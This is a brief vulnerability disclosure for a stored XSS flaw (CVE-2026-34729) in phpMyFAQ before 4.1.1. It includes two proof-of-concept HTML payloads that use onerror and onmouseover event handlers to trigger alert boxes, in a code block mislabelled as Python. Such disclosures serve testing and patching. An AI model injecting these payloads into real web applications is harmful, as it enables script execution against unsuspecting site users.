phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, there is a stored XSS vulnerability via Regex Bypass in Filter::removeAttributes(). This issue has been patched in version 4.1.1.
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-34729 PoC: Stored XSS via Regex Bypass -->
<!-- Inject the following payload into a vulnerable field (e.g., FAQ answer) -->
<img src=x onerror=alert('CVE-2026-34729_XSS')>
<!-- Alternative payload testing regex bypass -->
<div onmouseover="alert('XSS')">Hover me</div>